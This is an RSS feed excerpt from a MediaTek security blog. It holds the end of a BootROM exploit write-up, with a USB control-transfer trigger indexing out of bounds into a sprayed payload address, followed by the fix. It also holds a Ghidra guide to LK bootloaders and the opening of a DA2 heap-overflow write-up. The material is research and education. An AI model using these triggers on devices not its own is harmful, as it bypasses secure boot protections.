&lt;pre&gt;&lt;code&gt;try:
    udev.ctrl_transfer(0xA1, 0, 0, 204, 0)
except usb.core.USBError as e:
    print(e)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;0xA1&lt;/code&gt; is &lt;code&gt;bmRequestType&lt;/code&gt; with the direction bit (&lt;code&gt;0x80&lt;/code&gt;), the class bit (&lt;code&gt;0x20&lt;/code&gt;), and the interface recipient bit (&lt;code&gt;0x01&lt;/code&gt;) set. This translates to a device-to-host, class-specific request addressed to an interface.&lt;/p&gt;
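&lt;p&gt;For anyone who doesn&apos;t have the &lt;code&gt;bmRequestType&lt;/code&gt; layout memorized, here is a small decoding sketch. Both helpers are hypothetical; &lt;code&gt;reaches_class_handler&lt;/code&gt; only approximates the two checks shown earlier in &lt;code&gt;USB_Endpoint0_Idle&lt;/code&gt;:&lt;/p&gt;

```python
def decode_bm_request_type(value):
    """Split bmRequestType into (direction, type, recipient) per the USB 2.0 layout."""
    direction = "device-to-host" if value // 0x80 else "host-to-device"          # bit 7
    req_type = ["standard", "class", "vendor", "reserved"][(value // 0x20) % 4]  # bits 6..5
    recipient = value % 0x20                                                     # bits 4..0
    return direction, req_type, recipient

def reaches_class_handler(value):
    """Mirror the checks applied before the if_info lookup: class type, 0xA1 or 0x21."""
    return decode_bm_request_type(value)[1] == "class" and value in (0xA1, 0x21)

print(decode_bm_request_type(0xA1))  # ('device-to-host', 'class', 1)
print(reaches_class_handler(0xA1), reaches_class_handler(0xC0))  # True False
```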
&lt;p&gt;&lt;code&gt;wIndex=204&lt;/code&gt; is what gets used to index into &lt;code&gt;if_info&lt;/code&gt;. &lt;code&gt;USB_Endpoint0_Idle&lt;/code&gt; receives the request and does:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&amp;amp;ep0info, &amp;amp;cmd);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The four bytes at &lt;code&gt;if_info[204].if_class_specific_hdlr&lt;/code&gt; are &lt;code&gt;00 0A 10 00&lt;/code&gt; (put there by the spray), which the CPU loads as the little-endian pointer &lt;code&gt;0x00100A00&lt;/code&gt;, so execution jumps straight to the payload at &lt;code&gt;0x100A00&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The stage1 payload confirms it&apos;s running by sending back &lt;code&gt;0xA1A2A3A4&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;data = d.read(4)
if data != b&quot;\xA1\xA2\xA3\xA4&quot;:
    raise RuntimeError(&quot;...&quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If that comes back, the exploit succeeded and the payload is running.&lt;/p&gt;
&lt;h1&gt;Fixes&lt;/h1&gt;
&lt;p&gt;The vulnerability was patched at some point. The first chip where the fix was publicly identified is the MT6853, &lt;a href=&quot;https://github.com/chaosmaster/bypass_payloads/issues/7&quot;&gt;seen in 2021&lt;/a&gt;, but it may have been patched earlier on other chips.&lt;/p&gt;
&lt;p&gt;The fix itself is straightforward: a simple bounds check on &lt;code&gt;wIndex&lt;/code&gt; before the handler dispatch.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// vulnerable
if (if_info[(byte)cmd.wIndex].if_class_specific_hdlr != NULL) {
    (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&amp;amp;ep0info, &amp;amp;cmd);
    return;
}

// fixed
if (((byte)cmd.wIndex &amp;lt; 3) &amp;amp;&amp;amp;
    (handler = if_info[(byte)cmd.wIndex].if_class_specific_hdlr, handler != NULL)) {
    (*handler)();
    return;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There are only three registered interfaces, so any &lt;code&gt;wIndex &amp;gt;= 3&lt;/code&gt; now gets rejected outright. The OOB access into &lt;code&gt;if_info&lt;/code&gt; is no longer possible.&lt;/p&gt;
&lt;p&gt;On the &lt;code&gt;BromCmd_SendCert&lt;/code&gt; side, the patched BROM also zeroes out the memory at &lt;code&gt;0x100A00&lt;/code&gt; if verification fails:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (verify_failed) {
    memset((void *)0x100A00, 0, len);  // clean up on failure
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So even if the jump could somehow be triggered, there&apos;d be nothing useful at &lt;code&gt;0x100A00&lt;/code&gt; to land on.&lt;/p&gt;
&lt;h1&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;Seven years. That&apos;s how long it took me to actually sit down and understand an exploit I&apos;ve been using since forever. Better late than never I guess.&lt;/p&gt;
&lt;p&gt;And honestly, now that I understand how it works, I&apos;m surprised at how &quot;simple&quot; it actually is, at least compared to a lot of the other exploits that I&apos;ve looked at.&lt;/p&gt;
&lt;p&gt;I wasn&apos;t even planning to make this a whole post; this was meant to be my own documentation for future reference, but I figured it might be useful for others as well. I hope it was informative.&lt;/p&gt;
</content:encoded></item><item><title>How to Reverse Engineer MediaTek Bootloaders</title><link>https://blog.r0rt1z2.com/posts/reverse-engineering-mediatek-lk/</link><guid isPermaLink="true">https://blog.r0rt1z2.com/posts/reverse-engineering-mediatek-lk/</guid><description>A quick introduction and guide to reverse engineering MediaTek bootloaders (LK)</description><pubDate>Mon, 30 Mar 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Introduction&lt;/h1&gt;
&lt;p&gt;I&apos;ve been working on a lot of projects involving MediaTek bootloaders lately, and they&apos;ve been getting more attention over time.&lt;/p&gt;
&lt;p&gt;Because of that, I thought it would make sense to put together a proper guide on how to reverse engineer MediaTek LKs, while keeping it as beginner friendly as possible and adding some visuals along the way.&lt;/p&gt;
&lt;p&gt;I&apos;ve written a few guides on this topic before, but I&apos;ve improved quite a bit since then and started using some new techniques that make the process easier.&lt;/p&gt;
&lt;p&gt;So instead of leaving everything scattered, this guide brings it all together in one place (or tries to, at least).&lt;/p&gt;
&lt;h1&gt;Requirements&lt;/h1&gt;
&lt;p&gt;This guide assumes you have a computer and at least some basic common sense. Other than that, you&apos;ll need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.oracle.com/java/technologies/downloads/&quot;&gt;JDK (for Ghidra)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.nsa.gov/ghidra&quot;&gt;Ghidra (this guide uses Ghidra exclusively)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/R0rt1z2/lkpatcher&quot;&gt;lkpatcher&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Install everything from the official sources linked above, and make sure your Java environment is set up correctly for Ghidra.&lt;/p&gt;
&lt;p&gt;I&apos;m not going to cover installation here since it&apos;s straightforward, and you can always look it up if needed.&lt;/p&gt;
&lt;h1&gt;Background&lt;/h1&gt;
&lt;p&gt;MediaTek uses a bootloader called LK (Little Kernel) on most of its Android devices, although some platforms may use alternatives like u-boot.&lt;/p&gt;
&lt;p&gt;LK typically acts as the third-stage bootloader and runs in S-EL1 (Secure EL1) on ARMv8 devices, and in PL1 (Supervisor mode) on ARMv7 devices. If we follow ARM naming conventions, this would be &lt;code&gt;BL33&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;There are two main variants of LK:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Legacy LK&lt;/strong&gt; (v1.0): Found on older devices. These are typically paired with V3 (legacy) or V5 (XFLASH) DA protocols. LK runs in ARMv7 mode, even on SoCs that support ARMv8.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Modern LK&lt;/strong&gt; (v2.0): Used on newer devices, typically paired with the V6 (XML) DA protocol. It runs in ARMv8 mode with the MMU enabled, inside a virtual memory space.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The LK image you find on a MediaTek device is packed and contains multiple sub-partitions. The exact number depends mostly on the LK variant.&lt;/p&gt;
&lt;p&gt;Legacy LK usually includes &lt;code&gt;lk&lt;/code&gt; and &lt;code&gt;lk_main_dtb&lt;/code&gt;, while modern LK includes &lt;code&gt;lk&lt;/code&gt;, &lt;code&gt;bl2_ext&lt;/code&gt;, &lt;code&gt;aee&lt;/code&gt;, &lt;code&gt;lk_main_dtb&lt;/code&gt;, and &lt;code&gt;lk_dtbo&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Each partition has its own header defining size and other runtime parameters, and in most cases also includes two associated certificates (&lt;code&gt;cert1&lt;/code&gt; and &lt;code&gt;cert2&lt;/code&gt;) used for verification as part of the secure boot chain.&lt;/p&gt;
&lt;p&gt;This is pretty obvious (and, in my opinion, a bit stupid), but some people still get confused: &lt;strong&gt;the file extension does not really matter.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You can list the sub-partitions in your image using lkpatcher:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ python3 -m lkpatcher pacman.bin --list-partitions
[INFO] MediaTek bootloader (LK) patcher - version: 4.0.3 by R0rt1z2
[INFO] Successfully loaded 6 patches in 4 categories
[INFO] Loaded image from pacman.bin with 5 partitions (version 2)

Partitions in bootloader image:
----------------------------------------
1. lk (927248 bytes)
2. bl2_ext (659112 bytes)
3. aee (885416 bytes)
4. lk_main_dtb (289015 bytes)
5. lk_dtbo (164385 bytes)
----------------------------------------
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;Instructions&lt;/h1&gt;
&lt;p&gt;Depending on the image you have, the exact steps may vary, but the general process is similar.&lt;/p&gt;
&lt;h2&gt;Extracting the actual LK binary&lt;/h2&gt;
&lt;p&gt;Start by extracting the actual &lt;code&gt;lk&lt;/code&gt; sub-partition from the image. You can do this with lkpatcher:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ python3 -m lkpatcher lk.bin -d lk
[INFO] MediaTek bootloader (LK) patcher - version: 4.0.3 by R0rt1z2
[INFO] Successfully loaded 6 patches in 4 categories
[INFO] Loaded image from lk.bin with 2 partitions (version 1)
========================================
Partition Name  : lk
Data Size       : 1246148 bytes
Addressing Mode : 0xffffffff
Memory Address  : 0x4c400000
========================================
[INFO] Successfully dumped partition lk to lk_lk.bin
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will give you a file called &lt;code&gt;lk_lk.bin&lt;/code&gt;, which is the actual LK binary we want to reverse engineer.&lt;/p&gt;
&lt;p&gt;Make sure to note down the &lt;code&gt;Memory Address&lt;/code&gt; from the output, as this is the base address where the binary is loaded in memory. This will be important later during analysis.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Also note down the version of the LK (v1.0 or v2.0)&lt;/strong&gt; as this determines the architecture and some of the techniques we&apos;ll use later on.&lt;/p&gt;
&lt;p&gt;For version 2 (modern) LKs, you might see a very large memory address (e.g. &lt;code&gt;0xffff000050f00000&lt;/code&gt;), which is completely normal, so don&apos;t worry about it.&lt;/p&gt;
&lt;h2&gt;Loading the Binary in Ghidra&lt;/h2&gt;
&lt;p&gt;If you haven&apos;t already, create a new Ghidra project. Give it a name and choose where to store it.&lt;/p&gt;
&lt;p&gt;Drag and drop the &lt;code&gt;lk_lk.bin&lt;/code&gt; file into the project window. This will open the &quot;Import File&quot; dialog.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_import1.png&quot; width=&quot;80%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;The only thing we need to configure here is the &lt;code&gt;Language&lt;/code&gt; option. &lt;strong&gt;Everything else can stay as is.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Click the three dots next to the &lt;code&gt;Language&lt;/code&gt; field to open the &quot;Select Language&quot; dialog. From here, choose the correct architecture for your binary:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;If you&apos;re working with a legacy LK (v1.0)&lt;/strong&gt;, select &lt;code&gt;ARM:LE:32:v7:default&lt;/code&gt;, as it runs in &lt;strong&gt;ARMv7&lt;/strong&gt; mode.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;If you&apos;re working with a modern LK (v2.0)&lt;/strong&gt;, select &lt;code&gt;AARCH64:LE:64:v8A:default&lt;/code&gt;, as it runs in &lt;strong&gt;ARMv8&lt;/strong&gt; mode.&lt;/li&gt;
&lt;/ul&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;ARMv7 (Legacy LK)&lt;/th&gt;
&lt;th&gt;ARMv8 (Modern LK)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_import_armv7.png&quot; width=&quot;100%&quot; /&gt;&lt;/td&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_import_armv8.png&quot; width=&quot;100%&quot; /&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;If selected correctly, it&apos;ll look like this (the Language will differ if you&apos;re dealing with a modern LK):&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_import2.png&quot; width=&quot;80%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Simply click &lt;code&gt;OK&lt;/code&gt; and wait for the file to be imported into the project.&lt;/p&gt;
&lt;h2&gt;Analyzing the Binary&lt;/h2&gt;
&lt;p&gt;After importing the file, it will appear in your project view. Double click it to open it in the CodeBrowser.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_project_view.png&quot; width=&quot;80%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;You&apos;ll be prompted to run auto-analysis. It is important that you choose &lt;code&gt;No&lt;/code&gt; here, as we still need to configure a few things first. Running it now will only cause confusion and make things harder.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_auto_analysis_prompt.png&quot; width=&quot;80%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Since we chose not to run auto-analysis, go to the top menu bar and locate the icon that looks like a RAM stick. Click it to open the &lt;code&gt;Memory Map&lt;/code&gt; window.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_memory_map_icon.png&quot; width=&quot;90%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;In the Memory Map, select the &quot;ram&quot; section and disable the &quot;W&quot; (write) permission, which is enabled by default. Only &quot;R&quot; (read) and &quot;X&quot; (execute) should remain enabled.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_memory_map.png&quot; width=&quot;90%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;In the same window, locate the house icon, which opens the &quot;Image Base Address&quot; dialog.&lt;/p&gt;
&lt;p&gt;Click it and set the base address to the &lt;code&gt;Memory Address&lt;/code&gt; you noted earlier when extracting the binary with lkpatcher (e.g. &lt;code&gt;0x4c400000&lt;/code&gt; or &lt;code&gt;0xffff000050f00000&lt;/code&gt;).&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_image_base.png&quot; width=&quot;50%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Click the &lt;code&gt;Save&lt;/code&gt; icon in the top left corner to apply the changes, then close the Memory Map window and return to the CodeBrowser.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_save_icon.png&quot; width=&quot;65%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;In the CodeBrowser, go to the top menu bar and click &lt;code&gt;Edit&lt;/code&gt; &amp;gt; &lt;code&gt;Tool Options&lt;/code&gt; to open the Tool Options dialog.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_tool_options_menu.png&quot; width=&quot;80%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Search for &quot;Unreachable&quot;, then go to &lt;code&gt;Decompiler &amp;gt; Analysis&lt;/code&gt; and disable the &quot;Eliminate Unreachable Code&quot; option (enabled by default). Click &lt;code&gt;Apply&lt;/code&gt;, then &lt;code&gt;OK&lt;/code&gt; to save.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_unreachable_code.png&quot; width=&quot;80%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Finally, trigger auto-analysis by pressing &lt;code&gt;A&lt;/code&gt; in the main CodeBrowser window. In the dialog that appears, leave everything as is and click &lt;code&gt;OK&lt;/code&gt;.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_auto_analysis.png&quot; width=&quot;90%&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;If everything was done correctly, once the analysis finishes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;For legacy LKs (v1.0), in the listing (ASM) view you should see a vector table, and in the Decompiler view you should see an unnamed function that sets up the stack, BSS, and other sections.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;For modern (v2.0) LKs, you won&apos;t see a vector table, but you should still see the unnamed function that sets up the stack, BSS, and other sections.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Legacy LK (v1.0)&lt;/th&gt;
&lt;th&gt;Modern LK (v2.0)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_legacy_lk_entrypoint.png&quot; width=&quot;100%&quot; /&gt;&lt;/td&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lkguide/ghidra_modern_lk_entrypoint.png&quot; width=&quot;100%&quot; /&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;That should be it. This guide was meant to be concise, so there’s not much more to explain here. You should now have an easier time understanding what certain functions do and how the bootloader works.&lt;/p&gt;
&lt;h2&gt;ARMv8 Bonus: Ghidra Script&lt;/h2&gt;
&lt;p&gt;If you&apos;re working with ARMv8 (modern) LKs, I have a Ghidra script that can speed things up quite a bit.&lt;/p&gt;
&lt;p&gt;It automatically resolves and renames a number of commonly used functions (like &lt;code&gt;lk_main&lt;/code&gt;, &lt;code&gt;dprintf&lt;/code&gt;, &lt;code&gt;fastboot_*&lt;/code&gt;, init functions, etc.), and also defines some basic structs and enums to make the decompilation output cleaner.&lt;/p&gt;
&lt;p&gt;You can use it by doing the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Add the script to your Ghidra scripts directory (via Script Manager -&amp;gt; Script Directories).&lt;/li&gt;
&lt;li&gt;Load and analyze your LK binary as shown above.&lt;/li&gt;
&lt;li&gt;Run the script from the Script Manager.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;More details and the script are available &lt;a href=&quot;https://github.com/R0rt1z2/ghidra-scripts/tree/main?tab=readme-ov-file#mediateklittlekernelpy&quot;&gt;in my GitHub repository&lt;/a&gt;.&lt;/p&gt;
</content:encoded></item><item><title>Exploiting MediaTek&apos;s Download Agent</title><link>https://blog.r0rt1z2.com/posts/exploiting-mediatek-datwo/</link><guid isPermaLink="true">https://blog.r0rt1z2.com/posts/exploiting-mediatek-datwo/</guid><description>Analysis and exploitation of MediaTek&apos;s second stage Download Agent</description><pubDate>Fri, 30 Jan 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Introduction&lt;/h1&gt;
&lt;p&gt;In September 2025, Chimera quietly &lt;a href=&quot;https://www.facebook.com/chimeratool/posts/pfbid0R9ETZbBPQEj2cZhnhRBJWr6YLfCHkBfyogXsR1uLUZMUpY3v6EA6zt7rYzgzoMY7l&quot;&gt;announced&lt;/a&gt; &quot;world-first&quot; support for MediaTek&apos;s latest Dimensity 9400 and 8400 SoCs running DAs compiled months after MediaTek had patched &lt;a href=&quot;https://penumbra.itssho.my/Mediatek/Exploits/Carbonara&quot;&gt;Carbonara&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So we figured they&apos;d either found a way around the patches, or they were sitting on something entirely new. &lt;strong&gt;We had to find out.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Shortly after &lt;a href=&quot;https://github.com/shomykohai&quot;&gt;shomy&lt;/a&gt; &lt;a href=&quot;https://web.archive.org/web/20260114133700/https://github.com/bkerler/mtkclient/pull/1558&quot;&gt;opened a PR adding Carbonara support to MTKClient&lt;/a&gt;, someone left a comment with a USB capture of Chimera and a note:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/github-comment.png&quot; alt=&quot;GitHub comment referencing the Chimera exploit&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;So we did.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;What followed was months of USB packet captures, late-night reversing sessions, and way too many crashes and reboots, all done together with &lt;a href=&quot;https://github.com/shomykohai&quot;&gt;shomy&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;What we eventually found was &lt;strong&gt;heapb8&lt;/strong&gt; (&lt;em&gt;/ˈhiːpbeɪt/&lt;/em&gt;, &quot;heap-bait&quot;), a heap overflow in DA2&apos;s USB file download handler that allows arbitrary code execution on V6 devices patched against Carbonara.&lt;/p&gt;
&lt;p&gt;In this post, we&apos;ll walk through how we went from noticing Chimera&apos;s suspicious update to achieving code execution on modern MediaTek SoCs.&lt;/p&gt;
&lt;p&gt;It&apos;s a long and fairly technical write-up, so take a seat. I&apos;ve tried to keep it readable, but it&apos;s still a deep dive.&lt;/p&gt;
&lt;h1&gt;Background&lt;/h1&gt;
&lt;p&gt;MediaTek devices have two different USB download modes exposed by different boot stages: BootROM and Preloader.&lt;/p&gt;
&lt;p&gt;For the past few years, tools like &lt;a href=&quot;https://github.com/bkerler/mtkclient&quot;&gt;MTKClient&lt;/a&gt; have been exploiting vulnerabilities in the BootROM&apos;s USB stack to gain code execution.&lt;/p&gt;
&lt;p&gt;However, MediaTek patched most of these vulnerabilities in newer SoCs, and to make matters worse, a lot of OEMs opted to disable BootROM USBDL entirely on their devices, leaving Preloader USBDL as the only option.&lt;/p&gt;
&lt;h2&gt;Download Agents&lt;/h2&gt;
&lt;p&gt;Since this writeup focuses on DA2 exploitation, let&apos;s briefly cover how MediaTek&apos;s Download Agents work.&lt;/p&gt;
&lt;p&gt;To interact with the device in either of these modes, MediaTek uses Download Agents (DAs). DAs are small programs that run on the device and handle USB communication, flashing, and other low-level operations.&lt;/p&gt;
&lt;p&gt;Each DA is built for a specific chipset (identified by its hardware code), though some DA files like &lt;code&gt;MTK_AllInOne_DA.bin&lt;/code&gt; bundle multiple chipsets into a single binary.&lt;/p&gt;
&lt;p&gt;There are three main DA protocol versions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Legacy (V3)&lt;/strong&gt;: Codename &lt;em&gt;himalaya&lt;/em&gt;. Found on older devices (MT65XX series).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://penumbra.itssho.my/Mediatek/Common/DA/XFlash-DA-Protocol&quot;&gt;XFlash (V5)&lt;/a&gt;&lt;/strong&gt;: Codename &lt;em&gt;raphael&lt;/em&gt;. Found on devices released between 2016 and ~2022.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://penumbra.itssho.my/Mediatek/Common/DA/XML-DA-Protocol&quot;&gt;XML (V6)&lt;/a&gt;&lt;/strong&gt;: Codename &lt;em&gt;chimaera&lt;/em&gt;. Found on modern devices, mainly Dimensity and newer Helio chips.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;heapb8 targets the XML (V6) DA protocol, so that&apos;s what we&apos;ll focus on.&lt;/p&gt;
&lt;h3&gt;Structure&lt;/h3&gt;
&lt;p&gt;The DA file starts with a 0x6C-byte header containing the magic string &lt;code&gt;MTK_DOWNLOAD_AGENT&lt;/code&gt; (or &lt;code&gt;MTK_DA_v6&lt;/code&gt; for V6), a version number, and the number of supported SoCs.&lt;/p&gt;
&lt;p&gt;Following the header is an array of DA entries, one per chipset. Each entry contains the hardware code, sub-code, and a list of regions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Region 0&lt;/strong&gt;: Loader/stub (small bootstrap code)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Region 1&lt;/strong&gt;: DA1&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Region 2&lt;/strong&gt;: DA2&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each region has an offset, length, load address, and signature length. The signature (if present) is appended at the end of the region data.&lt;/p&gt;
&lt;h3&gt;DA1 and DA2&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;DA1&lt;/strong&gt;: Handles early hardware initialization (PLL, PMIC, storage, DRAM) and USB communication setup. Its main job is to prepare the device and load DA2.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DA2&lt;/strong&gt;: Runs a small multithreaded kernel and handles the actual device operations: flashing, reading partitions, security checks, and everything else you&apos;d expect from a flash tool.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;heapb8 targets DA2, specifically its USB file download handler.&lt;/p&gt;
&lt;h3&gt;Uploading the DA(s)&lt;/h3&gt;
&lt;p&gt;MediaTek has 3 different security mechanisms in both BootROM and Preloader:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Secure Boot Control (SBC)&lt;/strong&gt;: Controls whether the current stage verifies the next stage of the boot chain. For BootROM, this means verifying Preloader. For Preloader, this means verifying LK or bl2_ext based on a security policy table.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Serial Link Authorization (SLA)&lt;/strong&gt;: Authenticates the host before allowing operations. There are two types:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;BROM SLA&lt;/strong&gt;: The BootROM sends a challenge that must be signed with an OEM-held key. MediaTek&apos;s implementation is a bit unusual: instead of standard RSA signing, they swap the public and private exponents.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DA SLA&lt;/strong&gt;: Introduced in V5 (raphael). If the DA is compiled with &lt;code&gt;DA_ENABLE_SECURITY&lt;/code&gt;, most commands are locked behind authentication. The host must call &lt;code&gt;CMD_SECURITY_GET_DEV_FW_INFO&lt;/code&gt; to get device info, sign it, then call &lt;code&gt;CMD_SECURITY_SET_FLASH_POLICY&lt;/code&gt; with the signed response. If valid, the DA registers the protected commands. You can check if DA SLA is enabled by reading the &lt;code&gt;DA.SLA&lt;/code&gt; system property.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Download Agent Authentication (DAA)&lt;/strong&gt;: Verifies the DA&apos;s signature before loading it. This is done by checking the signature appended to the DA against a trusted key before allowing execution.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;After handshaking (and BROM SLA if enabled), the host issues &lt;code&gt;CMD_SEND_DA&lt;/code&gt; (0xD7) to upload DA1. If DAA is enabled, the signature is verified before setting the &lt;code&gt;g_da_verified&lt;/code&gt; flag.&lt;/p&gt;
&lt;p&gt;The host then issues &lt;code&gt;CMD_JUMP_DA&lt;/code&gt; (0xD5) to transfer execution, but only if &lt;code&gt;g_da_verified&lt;/code&gt; is set, otherwise the device asserts and reboots.&lt;/p&gt;
&lt;p&gt;Once DA1 is running, a similar process repeats: DA1 verifies and loads DA2 using &lt;code&gt;CMD_BOOT_TO&lt;/code&gt;, then jumps to it.&lt;/p&gt;
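&lt;p&gt;To make the gating described above easier to picture, here is a toy model of the upload stage. It is only a sketch: &lt;code&gt;LoaderModel&lt;/code&gt; and its &lt;code&gt;handle&lt;/code&gt; method are hypothetical names, the &lt;code&gt;signature_ok&lt;/code&gt; argument stands in for the real signature check, and the behaviour with DAA disabled (accepting the upload unconditionally) is an assumption. Only the two command bytes and the role of &lt;code&gt;g_da_verified&lt;/code&gt; come from the text.&lt;/p&gt;

```python
from dataclasses import dataclass

CMD_SEND_DA = 0xD7  # command bytes quoted in the text
CMD_JUMP_DA = 0xD5


@dataclass
class LoaderModel:
    """Toy model of the stage that receives DA1 (BootROM or Preloader)."""

    daa_enabled: bool
    da_verified: bool = False  # stands in for g_da_verified

    def handle(self, command, signature_ok=False):
        if command == CMD_SEND_DA:
            # Assumption: with DAA disabled the upload is accepted as-is.
            self.da_verified = signature_ok or not self.daa_enabled
            return "uploaded"
        if command == CMD_JUMP_DA:
            if not self.da_verified:
                # The real device asserts and reboots at this point.
                raise RuntimeError("DA not verified: assert and reboot")
            return "jumped"
        raise ValueError(f"unknown command {command:#x}")


if __name__ == "__main__":
    loader = LoaderModel(daa_enabled=True)
    loader.handle(CMD_SEND_DA, signature_ok=True)
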